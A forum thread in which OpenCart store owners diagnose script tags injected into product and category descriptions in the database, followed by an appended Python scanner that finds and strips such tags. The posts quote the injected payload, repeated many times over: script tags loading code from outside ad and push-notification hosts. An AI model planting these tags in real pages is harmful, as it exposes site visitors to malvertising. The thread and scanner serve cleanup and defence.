Post by omsonic » Sat May 27, 2017 6:46 am

I know this is something to do with the SQL injection hack mentioned in other posts but I've tried all the solutions they suggest to no avail.
This is the code that keeps being inserted into my product descriptions.

Code:

<script data-cfasync="false" type="text/javascript" src="//p79479.clksite.com/adServe/banners?tid=79479_127480_7&amp;tagid=2"></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&amp;interactive=1&amp;pushup=1"></script>
What the hell stops this from happening :choke: :'( !?!?!


Post by IP_CAM » Sun May 28, 2017 12:54 am

"What the hell stops this from happening"

Well, any good DEV would be able to stop this, you don't need the devil :D
If it exists, it can and will be found. I assume the code has been placed in
a 'hidden' manner, possibly in a BASE64 format, so it cannot be found easily by
just searching for something like javascript...

But it may take some time. But make sure not to allow someone UNKNOWN
admin access to your site and data; only trust someone who can be identified by a
personal site and address as well as by a personal site email address.
Just to mention this, but even the OC world is full of sneakers! ;)
Good luck
Ernie
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.



Post by sims » Sun May 28, 2017 4:12 am

"I assume the code has been placed in a 'hidden' manner, possibly in a BASE64 format, so it cannot be found easily by just searching for something like javascript..."

No it isn't

There are NO alterations to ANY files in Opencart

This is a direct injection into the database - you will find it there

To the OP try https://www.getastra.com/ (no affiliation just a customer)


Post by IP_CAM » Sun May 28, 2017 6:43 am

well, then, one has to check for such in the database as well...
Ernie


Post by MrPhil » Sun May 28, 2017 8:43 am

Assuming it's lurking in the database, possibly in some common area (not product-specific), you'll have to do quite a bit of searching in all text fields. Not only could it be a clear string like pub2srv, but it might be encoded in some manner, and the code to decode it might contain strings like "base64", "encode", "decode", etc. That might also be in PHP code, but you say you've thoroughly checked it (actually compared against a fresh version, or a known-good backup?). I don't know if there's any place in OC where PHP code is stored in the database (rather than a file), but it's quite possible that HTML containing Javascript has been inserted into the database, and that JS might in turn be decoding the actual text you see.

Once you've found the source and cleaned it up, please report back where it was, and any evidence of how it got there. It will be of great interest to OC developers if the attack was conducted through something in OC itself (e.g., SQL injection), that needs to be fixed immediately, as opposed to something where the attacker got in as a result of site owner carelessness or a hosting security breach (document and caution store owners, but no code fixes needed).


Post by sims » Sun May 28, 2017 9:58 pm

It is not encoded.

It is always inserted in the Description field (every record)

2 tables are affected: category_description and product_description

You can clearly see the code in phpMyAdmin / MySQL Workbench

Here is what was put in:

Code:

<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" 
src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>
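
Added example, not part of any post above and not OpenCart code: the database search MrPhil describes, restricted to the description column of the two tables sims names, written in Python. It flags script tags stored raw or HTML-entity-encoded, reports the hosts they load from, and can strip them. Assumptions: the key columns are product_id / category_id plus language_id, the tables carry no prefix, no third-party script host is legitimate, and an in-memory SQLite database with constructed rows stands in for the store's MySQL database.

```python
import html
import re
import sqlite3
from urllib.parse import urlparse

# Assumptions: no third-party script host is legitimate; stock key column names.
ALLOWED_HOSTS = set()
TARGETS = {"product_description": "product_id", "category_description": "category_id"}
TAG = re.compile(r"(?:<|&lt;)script\b.*?(?:<|&lt;)/script\s*(?:>|&gt;)", re.I | re.S)
SRC = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def script_hosts(text):
    """Hosts of script tags in text (raw or entity-encoded); '(inline)' if no src."""
    hosts = []
    for tag in TAG.findall(text):
        m = SRC.search(html.unescape(tag))
        host = urlparse(m.group(1)).hostname if m else "(inline)"
        if host and host not in ALLOWED_HOSTS and host not in hosts:
            hosts.append(host)
    return hosts

def strip_scripts(text):
    """Drop flagged script tags, leaving the rest of the description untouched."""
    return TAG.sub(lambda m: "" if script_hosts(m.group(0)) else m.group(0), text)

def scan(conn, fix=False):
    """Return [(table, id, language_id, hosts)]; with fix=True also clean those rows."""
    found = []
    for table, key in TARGETS.items():
        sql = f"SELECT {key}, language_id, description FROM {table} ORDER BY {key}"
        upd = f"UPDATE {table} SET description = ? WHERE {key} = ? AND language_id = ?"
        for row_id, lang, desc in conn.execute(sql).fetchall():
            hosts = script_hosts(desc or "")
            if hosts:
                found.append((table, row_id, lang, hosts))
            if hosts and fix:
                conn.execute(upd, (strip_scripts(desc), row_id, lang))
    return found

def demo_db():
    """Constructed in-memory sample rows; the injected tag is one of those in the thread."""
    bad = '<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script>'
    conn = sqlite3.connect(":memory:")
    for table, key in TARGETS.items():
        conn.execute(f"CREATE TABLE {table} ({key} INT, language_id INT, description TEXT)")
    rows = [(1, 1, "<p>Blue mug</p>" + bad * 2), (3, 1, "<p>Clean row</p>"),
            (2, 1, html.escape("<p>Red mug</p>" + bad))]
    conn.executemany("INSERT INTO product_description VALUES (?, ?, ?)", rows)
    conn.execute("INSERT INTO category_description VALUES (7, 1, ?)", (bad,))
    return conn
```

Run it report-only first and take a database backup before using fix=True. Cleaning the rows does not close whatever hole was used to write them.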
